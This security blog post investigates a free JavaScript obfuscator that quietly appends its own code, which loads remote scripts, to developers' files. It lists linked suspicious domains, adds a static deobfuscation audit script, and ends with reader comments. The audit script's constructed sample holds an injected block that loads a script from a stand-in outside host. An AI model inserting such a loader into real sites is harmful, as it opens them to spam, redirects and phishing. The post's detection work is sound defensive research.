Why A Free Obfuscator Is Not Always Free.

We all love our code but some of us love it so much that we don’t want anyone else to read or understand it. When you think about it, that’s understandable – hours and hours of hard dev work, days of testing and weeks (months?, years?) of fixing bugs and after all of this, someone steals, changes or modifies your hard work.

To address these concerns, many developers will obfuscate their code.

Obfuscating Your Code

You’ve got your code, you love it, and you want to protect it. You can’t justify a premium obfuscator, so you turn to a free one. There are many available, and as developers our focus is simply to make sure our work can’t be easily ripped off.

You run your script through one of the several free obfuscators, copy and paste it in, and the result looks great.

You take this garbled, unreadable text, copy it to your site (or your client’s website) and all seems well. Everything works as expected. In a few days, weeks, or months, strange spam starts to appear on your website.

You leverage all the latest tools, run the greatest scans in the world, but nothing is amiss. You can’t find the culprit.

Validating by Deobfuscating

I recently had such a scenario on a client’s website. My colleague, Bruno Zanelatto, pushed a case to us in the Research group with exactly the characteristics described above. At first I thought, “it’s just a false positive”, but after a closer look I found things to be anything but okay.

My focus turned to the elements I couldn’t see – the obfuscated code. Everything else looked good: the database was fine, and the code base for the application was fine. It took approximately 5 seconds to deobfuscate the code. I add that as a note to developers, to demonstrate that obfuscation is not as safe as some might believe it to be.

The script itself was a food recipe generator, but in the deobfuscated output I noticed something strange.

The original legitimate script really was obfuscated and added to the site source, but what was this appendChild thing? It pointed to a URL that returned empty content, even when I crafted requests that looked as if they were coming from the real site. This was very curious; I had to understand where that appendChild was coming from and what it was doing. That turned my attention to the obfuscator itself, to understand how it was doing its work.

This rendered some interesting findings.

After checking the service, I noticed that when obfuscating one of my scripts, the obfuscator would add code of its own to my script.

In that output I intentionally commented out the original script and the related document.write (I got this whole block after two layers of deobfuscation). What’s not commented out is code that has nothing to do with the codebase. The authors of this service (htmlobfuscator.com) are appending their code to the existing codebase.

In the original case, it pointed to their domain. In this second case, the code generated on their site pointed to another (very suspicious) domain: jqueryapi.info. I was not able to get anything back by crafting a series of requests, but this is not uncommon, and it doesn’t mean they can’t start serving content for such requests at any other time. Those responses can vary as well, including infecting your website with spam, a malicious redirect, phishing or any number of nefarious actions.
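As an added example that is not part of the original post, the check below does the "validate by deobfuscating" step statically: it peels the wrapper layers such an obfuscator emits (unescape, String.fromCharCode, eval and document.write) without executing anything, then reports every external script host the unpacked code loads, so an appended appendChild block shows up in the report. The site host, the third-party domain and the sample snippets are constructed placeholders.

```javascript
// Added example (not from the original post): statically peel the wrapper layers a JavaScript
// obfuscator typically emits, WITHOUT executing the code, then list every external script host
// the unpacked result tries to load. Site host, third-party domain and snippets are constructed.
const SITE_HOSTS = new Set(["www.my-recipes.example"]);   // hosts the site legitimately loads from
const JSON_STR = '"(?:[^"\\\\]|\\\\.)*"';                   // one double-quoted string literal
const unhex = (s) => s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
const unquote = (lit) => { try { return JSON.parse(lit); } catch { return null; } }; // null = not JSON-safe

// One static pass: unescape("%3C..") and String.fromCharCode(..) become plain string literals,
// and eval("..") / document.write("..") are replaced by the payload they would have run.
function peelOnce(code) {
  return code
    .replace(new RegExp(`unescape\\((${JSON_STR})\\)`, "g"), (m, lit) => {
      const s = unquote(lit); return s === null ? m : JSON.stringify(unhex(s)); })
    .replace(/String\.fromCharCode\(\s*([\d\s,]+)\)/g,
      (_, nums) => JSON.stringify(String.fromCharCode(...nums.split(",").map(Number))))
    .replace(new RegExp(`(?:eval|document\\.write)\\((${JSON_STR})\\)`, "g"), (m, lit) => unquote(lit) ?? m);
}

// Repeat until nothing changes (bounded), then report what the final code reaches out to.
function auditObfuscatedScript(code, allowedHosts = SITE_HOSTS, maxPasses = 10) {
  let unpacked = code, passes = 0;
  for (; passes < maxPasses; passes++) {
    const next = peelOnce(unpacked);
    if (next === unpacked) break;
    unpacked = next;
  }
  const hosts = new Set();
  for (const m of unpacked.matchAll(/src\s*=\s*["']?(?:https?:)?\/\/([^\/"'\s>]+)/g)) hosts.add(m[1].toLowerCase());
  return {
    passes,
    unpacked,
    injectsScriptTag: /createElement\(\s*["']script["']\s*\)/.test(unpacked) && /appendChild/.test(unpacked),
    unexpectedHosts: [...hosts].filter((h) => !allowedHosts.has(h)).sort(),
  };
}

// Constructed sample of obfuscator output: the developer's own code wrapped in
// document.write(unescape(..)), followed by an appended block that loads a script from a
// third-party host (a placeholder, not the domain named in the post).
const legit = 'document.getElementById("recipe").textContent = "Pancakes: flour, milk, eggs";';
const appended = 'var s=document.createElement("script");s.src="//third-party.example/jquery.js";document.body.appendChild(s);';
const toHex = (s) => [...s].map((c) => "%" + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0")).join("");
const toCodes = (s) => [...s].map((c) => c.charCodeAt(0)).join(",");
const SAMPLE = `document.write(unescape(${JSON.stringify(toHex("<script>" + legit + "</script>"))}));` +
               `eval(String.fromCharCode(${toCodes(appended)}));`;

console.log(JSON.stringify(auditObfuscatedScript(SAMPLE), null, 2));
```

Any host in `unexpectedHosts` that you did not put there yourself is the thing to investigate; the unpacked text is returned so the appended block can be read in the clear.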

In Bad Company

After some more digging, I noticed there are other domains hosted on the same server. And the names speak for themselves:

april-broker.com (error when resolving the name)
crmsys.ru (requires login to display anything)
htmlobfuscator.com (our malicious obfuscator)
htmlobfuscator.info (obfuscator clone)
javascript-obfuscator.info (obfuscator clone)
javascriptcompressor.info (obfuscator clone)
javascriptcrambler.com (obfuscator clone)
javascriptobfuscate.com (obfuscator clone)
javascriptobfuscator.info (obfuscator clone)
jqueryapi.info (empty page)
myobfuscate.com (obfuscator clone)
obfuscatorjavascript.com (obfuscator clone)
obfuscatorjavascript.info (obfuscator clone)
phptds.com (error when resolving the name)
promebel21.ru (error when resolving the name)
softtradelab.com (ad-network offering own ad-system and networks… what a surprise!)

We leveraged VirusTotal to look up these domains and get more information; the results were not surprising.

Widespread Use of Malicious Obfuscators

During my research it turned out that this free obfuscator seems to be widely used! Based on the original infected file name, I realized that it was also part of a legitimate WordPress plugin, Simple Converter (and it might not be the only one).

This plugin was last updated in 2013, and the author evidently used a free service to obfuscate his code. Code which he loved, which he developed, and which he wanted to protect and serve for free. Well, nowadays almost nothing is truly free.

Keep your eyes open and stay safe!

7 comments
  1. Howdy!

    We *do not* allow obfuscated code on the WordPress.org plugin directory. Ever. For any case, whether it is security related or not.

    This is actually mentioned in our detailed guidelines, but I’m just going to quote that bit here so everybody can see it:

    > “4. No obfuscated code. We believe that obfuscated code violates the spirit, if not the letter, of the GPL license under which we operate. The GPL specifically states “The source code for a work means the preferred form of the work for making modifications to it.” Intentionally obfuscated code is not the preferred form, and not allowed in the repository under any circumstances. However, note that some systems, like Paypal donation buttons, use encoded code as part of their normal operating mechanism. This is not considered to be “obfuscated” as this is simply how these types of systems operate and it is not a choice by the plugin author. These types of things are acceptable, but may result in the author being questioned about it for edge cases. If a non-encoded method for such services is available, use it.”

    We do take our guidelines very seriously, and we remove plugins from the directory when we are informed of violations of those guidelines. You can always report any perceived violation directly to our review team by emailing us at plugins@wordpress.org. Please do report these issues.

    This isn’t even about security, as such. Obfuscated code is a big no-no for us, and while we cannot check every checkin to the repository, we do take strong action when we know an issue exists.

    It would have been nice if you had told us about the problem so that we could get it solved on our end, prior to your blog post.

  2. Great article. Pretty clever technique to surreptitiously place malware code onto inconspicuous users’ websites, uncovered.

  3. The included script tag is quite clever indeed. The developers who obfuscate their javascript, not so much.

    It’s trivial to deobfuscate JS as it still has to be in a format the browser understands, so best case it’s not really obfuscated but minimized, and if it is somehow obfuscated whatever is used to deobfuscate it would still need to be included in the clientside code, and is freely available.

    People who do this don’t realize their code probably isn’t worth anything anyway, and if you’re that worried someone is going to steal your code, you should probably keep it to yourself, which is going to be hard with client-side code.

  4. Hey @Otto4242

    You’re right, we honestly didn’t even think of the .org guidelines or whether it was in or out of line with them. We were more fascinated by what was being done, little to do with .org or the platform. Will keep that in mind for the future.

    All the best

    Tony

  5. Frankly, using an obfuscator (whether free or paid, ‘legitimate’ or malicious) is a terrible idea anyway. It only inconveniences your users (page files to load, cannot monkeypatch a bug, …), whereas it does approximately nothing against somebody who wants to use your code for their own profit – after all, they have a financial incentive, and breaking an obfuscator is trivial, especially if there’s money to be earned by doing so.

    It won’t stop those you’re trying to stop.
